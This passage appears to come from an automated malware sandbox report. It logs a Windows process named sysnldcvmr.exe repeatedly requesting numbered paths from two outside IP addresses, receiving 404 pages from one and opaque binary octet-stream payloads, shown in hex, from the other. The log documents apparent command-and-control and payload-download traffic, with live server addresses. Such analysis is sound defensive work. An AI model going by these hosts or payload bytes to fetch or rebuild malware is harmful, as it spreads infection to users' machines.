                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  47192.168.2.45008291.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:58:21.529294014 CET166OUTGET /2 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141
                                                                                                                  Nov 30, 2024 01:58:22.944890976 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:58:22 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  48192.168.2.45008491.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:58:25.091792107 CET166OUTGET /3 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141
                                                                                                                  Nov 30, 2024 01:58:26.530436993 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:58:26 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  49192.168.2.45008691.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:58:28.675144911 CET166OUTGET /4 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  50192.168.2.45008791.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:58:32.253345013 CET166OUTGET /5 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141
                                                                                                                  Nov 30, 2024 01:58:33.584167004 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:58:33 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  51192.168.2.450089185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:58:36.905751944 CET166OUTGET /1 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:38.345877886 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:58:38 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 8960
                                                                                                                  Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "671230ee-2300"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                                                                  Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
                                                                                                                  Nov 30, 2024 01:58:38.345966101 CET1236INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                                                                  Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP~TELBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^
                                                                                                                  Nov 30, 2024 01:58:38.345978022 CET248INData Raw: 25 31 0a 68 9c d8 ba 48 4c 90 81 b7 28 74 68 c8 16 f9 b8 2a c6 90 b0 6c 31 39 f2 bf 87 64 53 3a 32 36 df 01 fc e5 9e 18 72 19 69 e2 c7 ef 65 32 01 84 09 84 3b 94 85 f3 13 25 da 52 6f 20 19 c5 d9 dd d1 da 08 6e 35 b4 1e 41 c3 9d d9 91 9f 3f 3a 82
                                                                                                                  Data Ascii: %1hHL(th*l19dS:26rie2;%Ro n5A?:p"~ B'P?:/B1%yN[u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)W
                                                                                                                  Nov 30, 2024 01:58:38.346304893 CET1236INData Raw: 08 29 60 c4 16 0a 86 01 d5 26 11 61 aa 30 6f e5 63 5d 55 ce 8f 9e 01 ae 06 6f cd a4 81 11 1a 80 ad f8 28 99 34 e6 4d 27 5f fd 73 a1 d4 47 0c ff d2 95 40 6d f0 78 79 36 ff 0c e4 a1 28 b4 10 99 fa 22 89 53 97 a6 f2 39 25 35 5d 39 fa 5b 97 db f5 94
                                                                                                                  Data Ascii: )`&a0oc]Uo(4M'_sG@mxy6("S9%5]9[h1_&},fOnNH*c>/:I(+_a[;Q|~E|$e|B#IynhJ|k;OTvmk@5Hdtrh S^
                                                                                                                  Nov 30, 2024 01:58:38.346327066 CET1236INData Raw: bd dc 54 cf 9d d8 9b 53 fb f5 07 06 08 67 41 37 d6 7c 17 9d 1c 49 93 f0 9b 93 f1 d6 d6 b6 35 59 e7 26 68 4f 8e 68 9b f3 41 c9 f3 1b fb 08 63 55 7a 28 82 53 fb f0 ed 37 53 7d 91 ec d8 ee 29 b7 f5 d3 21 e9 73 f9 25 46 27 c6 1b 47 57 93 66 9d 53 e2
                                                                                                                  Data Ascii: TSgA7|I5Y&hOhAcUz(S7S})!s%F'GWfS\D5LR)r9X+%qyF=Z?!3iRMpl/BrlB7-*Yt;|rS{.gdfow%f.tBH{
                                                                                                                  Nov 30, 2024 01:58:38.346340895 CET248INData Raw: 28 92 91 8d 4c 82 37 17 51 52 80 45 55 36 3d bb 6f 91 4e a3 4c 85 11 98 20 9a 7c 7e 9f b6 9a 10 d5 bb 97 e8 3b da 76 02 46 aa 7c ca f7 af 0f 35 71 e8 b5 4f 68 9f 7f 8c 5b f4 e3 7f cd e4 49 b3 8b a7 4f ae d9 b7 2a 92 39 cc 1d f7 25 69 a2 fd ca 9d
                                                                                                                  Data Ascii: (L7QREU6=oNL |~;vF|5qOh[IO*9%i0q~3T|UJ.LCw1w5edQDqH=.~osXouHePdtnq`Y6G4@4G"EL*-D$hOYCMt;Eby
                                                                                                                  Nov 30, 2024 01:58:38.346977949 CET1236INData Raw: 3b 74 51 be 85 05 66 0a 71 89 56 7b 23 ef 62 eb 74 a4 a1 98 46 d2 dd b1 ee e3 47 91 89 f2 99 71 dc c6 93 4e 9e 89 fe 50 ea 9d f9 73 f3 dc 25 19 ad f1 23 40 23 26 41 95 d6 f4 47 d6 20 3d bc 4f 50 9f 70 c8 2a ca bb 9f 75 04 ec 4c 78 e9 cd 21 24 bf
                                                                                                                  Data Ascii: ;tQfqV{#btFGqNPs%#@#&AG =OPp*uLx!$A<k_xmO1>v@O;KbSs YUN7L'A4Ht\isoh-%a~4A7n7C;0PQCgkwN
                                                                                                                  Nov 30, 2024 01:58:38.346991062 CET1236INData Raw: b1 53 8d e6 1f 43 0a 22 07 24 10 5a 1b cc 5e 22 4c 64 d0 cf 28 1b 24 a8 fd 5d 0e a7 38 e6 2c 0c cf cb a2 02 8e 43 ff d5 22 0a d7 fd fb 65 13 e7 82 ba f3 30 2b c3 59 1d 8c 11 5f 25 7d e2 e2 9a 61 a8 5c 77 5f af ad 72 90 61 0a a4 3d fa a9 ad 0c e2
                                                                                                                  Data Ascii: SC"$Z^"Ld($]8,C"e0+Y_%}a\w_ra=N.>e@b#T\@A$FM.1!FWy7JKPh,2W>>{]t4iUaAIdBJ+:O"F7&Vn#Rj*$.z"Wt,qNh"1=3
                                                                                                                  Nov 30, 2024 01:58:38.347003937 CET248INData Raw: 54 4c 7c cb b9 79 ca fe 4c 17 8d 93 22 88 09 b9 f5 c4 36 45 30 a8 2c c4 29 da af 3d 55 db 50 b9 bd 72 34 18 d6 3b 32 4a 61 13 51 94 b4 7b 17 66 88 d9 38 1b 2d ac c0 b9 98 ee 93 bf 7b 3d bb 9b ef 69 d0 0f 87 2c 4a 48 79 20 2b c3 18 1a 39 19 4f 71
                                                                                                                  Data Ascii: TL|yL"6E0,)=UPr4;2JaQ{f8-{=i,JHy +9Oq;;=`}>b2[6R+6w|Ajc,{2.dEp,YsEn8W!A2Ou`H0w.z+Vj2W7r5HQ]Q(3j?vK={,m@^


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  52192.168.2.450091185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:58:40.673165083 CET166OUTGET /2 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:42.080255032 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:58:41 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 10496
                                                                                                                  Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "67154d18-2900"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                                                                  Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
                                                                                                                  Nov 30, 2024 01:58:42.080331087 CET1236INData Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96
                                                                                                                  Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>*B aw'&iEpRaMZ|3Fk<lQ;GbPMlh5}8m;ajW,N7&QK
                                                                                                                  Nov 30, 2024 01:58:42.080344915 CET1236INData Raw: 63 34 74 b5 c2 9f e6 cf 24 40 6d 6d 39 94 34 21 a1 59 32 49 93 8d 45 6f 16 41 e3 3e fb e9 ec 01 f9 89 40 75 7d 84 c1 29 99 2e 8f f9 01 1b d7 e2 f5 ea f5 37 7e 95 c0 87 7f d4 e2 e3 b8 2c a3 95 7b 43 15 a1 69 fe 92 c8 13 e2 7f 5f 3b 68 4b fa 25 e1
                                                                                                                  Data Ascii: c4t$@mm94!Y2IEoA>@u}).7~,{Ci_;hK%D&kuY'p=/a:NTtKu"1X[8Ibdym-*|+>a`<Z!%| 4&[+usL^etpuu);Xb<>M\
                                                                                                                  Nov 30, 2024 01:58:42.080914021 CET1236INData Raw: 0b a6 7d 79 c6 0e 19 41 de 44 a9 03 74 f2 fb a9 92 bc 27 b6 69 9d 42 1a 59 26 6e 6d a8 df 05 cd 7b e6 9c e9 45 0f 67 74 bc 1a e1 59 dd 58 26 67 a8 cb ea 52 87 27 f1 9b fe 95 bd 52 bf 68 3a 2f 74 d5 bc 82 48 3c f6 ef 52 41 bf 9a 2d b2 e4 48 3f 02
                                                                                                                  Data Ascii: }yADt'iBY&nm{EgtYX&gR'Rh:/tH<RA-H?:3a$8;SU*rN1QIuc>"W|1Rrm]T1&PSTQZqEtgc[U*,@+LoR0rMwfu^VUzcie_$eM;B
                                                                                                                  Nov 30, 2024 01:58:42.080928087 CET1236INData Raw: 0e 0b 73 b4 cc 61 72 90 49 03 c9 0c 34 6e 73 ed 3b 3f 45 e7 2a 84 8c 3b 11 6d 21 89 00 60 23 47 8c c2 4b 9e c0 2c d8 47 80 38 fd e5 6a f8 e1 31 10 55 0b 54 d4 89 df 1b da 0d 24 5b 6e ee 18 45 4b 11 59 49 7e 62 cf 22 93 99 ab 6f bd b6 fe 39 0b 36
                                                                                                                  Data Ascii: sarI4ns;?E*;m!`#GK,G8j1UT$[nEKYI~b"o96{'#S(cJK4*Hft5U>1uauV|p8"`;uT;_Ibmppc&D5HCwjrH&532a`#&A
                                                                                                                  Nov 30, 2024 01:58:42.080940962 CET1236INData Raw: 52 57 11 8b 24 3e 89 1b 44 e8 11 27 36 d3 98 6c 64 5f c1 5e 36 d1 aa 50 5a 3a 84 e5 9f 20 97 64 a4 c0 4b 41 9b fa 0a f4 83 09 e0 69 91 cf e7 2c d4 09 d5 e4 18 60 53 3c 4e cb 83 5e 89 f8 2f 97 1b db be 93 32 73 f7 8d f7 65 6f 24 ee f6 74 d5 08 d2
                                                                                                                  Data Ascii: RW$>D'6ld_^6PZ: dKAi,`S<N^/2seo$tRu@.\]=/E,PX<yu6CIEF`!Ue$u9r;SwjF"dDxsWY/"4|bob`|bS
                                                                                                                  Nov 30, 2024 01:58:42.081789970 CET1236INData Raw: b5 f2 e5 56 94 d5 a7 ba 2e 4b ef 19 cb 34 b8 a7 99 e1 80 8c cc c0 91 a1 56 e3 29 95 04 e6 0f b9 a5 86 93 81 fe fb 19 09 f6 66 dc 6a 30 a9 58 e4 78 2d 5f 4e 45 b3 14 af 02 96 da 20 60 39 3e 4b 48 c0 80 cb 76 02 0b 8c c1 87 09 1a bc 98 6d 65 18 af
                                                                                                                  Data Ascii: V.K4V)fj0Xx-_NE `9>KHvme#R]/I{J4],GCrJZ3;:U$=%W&^/UR1i [kkRh1;Cz^DO"j$qQT`r!Q[(7_`E
                                                                                                                  Nov 30, 2024 01:58:42.081809998 CET1236INData Raw: 28 11 af e2 41 9b fa 51 e9 ab d8 2a 79 da ce 15 40 37 b8 70 18 de 0f 5b 95 e6 1e b5 38 1d 61 99 66 96 eb c4 00 1f 65 72 58 fc 2e 42 79 8e 29 b8 e0 15 7b 9e 33 1a 0b 8c e5 49 8f 3e 92 cc 6d 67 59 91 10 68 27 3e 93 f3 d5 fa 1d e9 90 99 e6 46 67 f1
                                                                                                                  Data Ascii: (AQ*y@7p[8aferX.By){3I>mgYh'>Fg),},([vUl s?u/AsGbrRbV1oLE?fpK`|cv\}0>jmer^kvrM5uMW~c3FzWSkUM@q
                                                                                                                  Nov 30, 2024 01:58:42.081824064 CET873INData Raw: b7 1b ed 55 22 52 87 a3 c5 38 9f b8 98 95 ff b4 f2 c4 e9 dd 2d 0b 3c 5d 3d 5e 30 5e fd c6 f8 54 b4 2a e8 93 3d a8 1f 7d 5c e5 4d 1d c9 7e cb 06 5c 4c 2c 00 33 bd 10 e0 11 48 3b 01 7b 52 15 1a d2 67 2c a4 26 fc e8 3f 86 7e 08 4f 27 64 b0 a6 1b 25
                                                                                                                  Data Ascii: U"R8-<]=^0^T*=}\M~\L,3H;{Rg,&?~O'd%`dJU]~Y:|2Jd-\ Q@n\|{hYc$P;.s^X"@Nn>$2Y+J@Y},?r`41RmU\gd


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  53192.168.2.450093185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:58:44.235547066 CET166OUTGET /3 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
